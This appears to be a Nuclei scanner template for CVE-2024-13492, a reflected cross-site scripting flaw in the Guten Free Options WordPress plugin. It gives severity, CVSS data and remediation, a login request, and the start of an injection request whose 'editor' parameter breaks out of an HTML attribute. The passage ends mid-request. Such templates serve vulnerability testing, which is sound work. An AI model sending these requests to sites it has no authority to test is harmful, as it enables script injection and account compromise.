id: CVE-2024-13492
info:
name: Guten Free Options - Cross Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
Guten Free Options WordPress plugin <= 0.9.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click malicious link.
impact: |
Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise.
remediation: |
Update to the latest version of the plugin where the issue is fixed.
reference:
- https://wpscan.com/vulnerability/a4a75b75-4801-4ed4-bcc6-4874ac169562/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13492
cwe-id: CWE-79
epss-score: 0.00573
epss-percentile: 0.44764
cpe: cpe:2.3:a:wordquest:guten_free_options:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wordquest
product: guten_free_options
tags: cve,cve2024,wordquest,guten-free-options,authenticated,wordpress,wp,wp-plugin,xss
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=
matchers:
- type: dsl
dsl:
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/edit.php?post_type=page&editor=1">